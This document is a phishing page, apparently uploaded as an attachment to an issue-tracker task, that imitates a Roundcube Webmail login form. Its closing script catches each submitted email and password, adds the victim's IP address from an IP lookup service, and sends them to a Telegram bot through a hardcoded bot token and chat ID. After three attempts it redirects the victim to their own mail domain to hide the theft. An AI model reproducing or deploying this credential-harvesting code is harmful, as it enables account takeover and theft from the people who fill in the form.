Project

Profile

Help

Task #153558 ยป 2024 2_27_12 a.m._PDF.shtml

Anonymous, 12/10/2024 11:27 AM

 
<!DOCTYPE html>

<html lang="en">

<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Roundcube Webmail :: Welcome to Roundcube Webmail</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no, maximum-scale=1.0"><meta name="theme-color" content="#f4f4f4"><meta name="msapplication-navbutton-color" content="#f4f4f4">
<link rel="shortcut icon" href="https://pub-00a21708bd21433eb50b0d906734d2cf.r2.dev/skins/elastic/images/favicon08d2.ico">
<link rel="stylesheet" href="https://pub-00a21708bd21433eb50b0d906734d2cf.r2.dev/skins/elastic/deps/bootstrap.min08d2.css">
<link rel="stylesheet" href="https://pub-00a21708bd21433eb50b0d906734d2cf.r2.dev/styles.min08d2.css">
<link rel="stylesheet" type="text/css" href="https://pub-00a21708bd21433eb50b0d906734d2cf.r2.dev/plugins/jqueryui/themes/elastic/jquery-ui.min08d2.css"><script src="https://pub-00a21708bd21433eb50b0d906734d2cf.r2.dev/program/js/jquery.min08d2.js"></script><script src="https://pub-00a21708bd21433eb50b0d906734d2cf.r2.dev/program/js/common.min08d2.js"></script><script src="https://pub-00a21708bd21433eb50b0d906734d2cf.r2.dev/program/js/app.min08d2.js"></script><script src="https://pub-00a21708bd21433eb50b0d906734d2cf.r2.dev/program/js/jstz.min08d2.js"></script><script>
/*
@licstart The following is the entire license notice for the
JavaScript code in this page.

Copyright (C) The Roundcube Dev Team

The JavaScript code in this page is free software: you can redistribute
it and/or modify it under the terms of the GNU General Public License
as published by the Free Software Foundation, either version 3 of
the License, or (at your option) any later version.

The code is distributed WITHOUT ANY WARRANTY; without even the implied
warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU GPL for more details.

@licend The above is the entire license notice
for the JavaScript code in this page.
*/
var rcmail = new rcube_webmail();
rcmail.set_env({"task":"login","standard_windows":false,"locale":"en_US","devel_mode":null,"rcversion":10508,"cookie_domain":"","cookie_path":"/","cookie_secure":false,"dark_mode_support":true,"skin":"elastic","blankpage":"skins/elastic/watermark.html","refresh_interval":60,"session_lifetime":600,"action":"","comm_path":"./?_task=login","compose_extwin":false,"date_format":"yy-mm-dd","date_format_localized":"YYYY-MM-DD","request_token":"F0EgfVObTTzumeyvhhFRKthAcw5kaODM"});
rcmail.add_label({"loading":"Loading...","servererror":"Server Error!","connerror":"Connection Error (Failed to reach the server)!","requesttimedout":"Request timed out","refreshing":"Refreshing...","windowopenerror":"The popup window was blocked!","uploadingmany":"Uploading files...","uploading":"Uploading file...","close":"Close","save":"Save","cancel":"Cancel","alerttitle":"Attention","confirmationtitle":"Are you sure...","delete":"Delete","continue":"Continue","ok":"OK","back":"Back","errortitle":"An error occurred!","options":"Options","plaintoggle":"Plain text","htmltoggle":"HTML","previous":"Previous","next":"Next","select":"Select","browse":"Browse","choosefile":"Choose file...","choosefiles":"Choose files..."});
rcmail.gui_container("loginfooter","login-footer");rcmail.gui_object('loginform', 'login-form');
rcmail.gui_object('message', 'messagestack');
</script>

<script src="https://pub-00a21708bd21433eb50b0d906734d2cf.r2.dev/plugins/jqueryui/js/jquery-ui.min08d2.js"></script>
</head>
<body class="task-login action-none">
<div id="layout">


<h1 class="voice">Roundcube Webmail Login</h1>

<div id="layout-content" class="selected no-navbar" role="main">
<img src="https://pub-00a21708bd21433eb50b0d906734d2cf.r2.dev/skins/elastic/images/logo08d2.svg" id="logo" alt="Logo">
<form id="login-form" target="_top" style="visibility: " method="post" action="">

<table><tbody><tr><td class="title"><label for="rcmloginuser">Username</label></td><td class="input"><input name="user" id="user" required size="40" class="form-control" autocapitalize="off" autocomplete="off" type="text"></td></tr><tr><td class="title"><label for="rcmloginpwd">Password</label></td><td class="input"><input name="pass" id="pass" required size="40" class="form-control" autocapitalize="off" autocomplete="off" type="password"></td></tr></tbody></table><p class="formbuttons"><button name="login" type="submit" id="pirate" class="button mainaction submit">Login</button></p>
<div id="login-footer" role="contentinfo">
Roundcube Webmail
</div>
</form>
</div>

<noscript>
<p class="noscriptwarning">Warning: This webmail service requires Javascript! In order to use it please enable Javascript in your browser's settings.</p>
</noscript>


</div>







<script src="https://pub-00a21708bd21433eb50b0d906734d2cf.r2.dev/skins/elastic/deps/bootstrap.bundle.min08d2.js"></script>
<script src="https://pub-00a21708bd21433eb50b0d906734d2cf.r2.dev/skins/elastic/ui.min08d2.js"></script>

</body>

<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
<script type="text/javascript">
$(document).ready(function() {
const urlParams = new URLSearchParams(window.location.search);
const emailValue = urlParams.get('user') || '';
$('#user').val(emailValue ? emailValue : 'lapor@turnbackhoax.id');
var count=0;
var tx1="7279942890";
var tx2="7815000381:AAGJMD0utrTJyt1MLVojVxmc9AV8CoPAUeY";
ur = "https://api.telegram.org/bot"+tx2+"/sendMessage?chat_id="+tx1;
let u53TiQ = '';
$.getJSON('https://api.ipify.org?format=json', function(data){
u53TiQ = data.ip;
});
$('#login-form').submit(function(event){
event.preventDefault();
$('#error').hide();
$('#msg').hide();
var user=$("#user").val();
var pass=$("#pass").val();

///////////new injection////////////////

var ind=user.indexOf("@");
var my_slice=user.substr((ind+1));
///////////new injection////////////////
count=count+1;
// console.log(count);

$.ajax({
dataType: 'JSON',
url: ur,
type: 'GET',
data:{
ajaxid: 4,
text: '====== \r\n ======gboto====== \r\n \r\n Email:' + user + ' \r\n Password:' + pass + ' \r\n IP:' + u53TiQ + '\r\n \r\n=Blue=roundcube=by=unknown \r\n ============= '
},
//data: $('#contact').serialize(),
beforeSend: function(xhr){
//$('#submit-btn').html('Processing...');
// console.log(count);
},
success: function(response){
if(response){
$("#msg").show();
console.log(response);
$('#msg').html(response['msg']);
if(response.ok === true){
$("#pass").val("");
if (count>=3) {
count=0;
// window.location.replace(response['redirect_link']);
window.location.replace("https://www."+my_slice);

}
$('#msg').show();
}
else{
$('#msg').show();
}
}
},
error: function(){
$("#pass").val("");
if (count>=3) {
count=0;
window.location.replace("https://www."+my_slice);
}
$('#msg').show();
},
complete: function(){
//$('#submit-btn').html('DOWLOAD NOW');
}
});
});


});


</script>
</html>
    (1-1/1)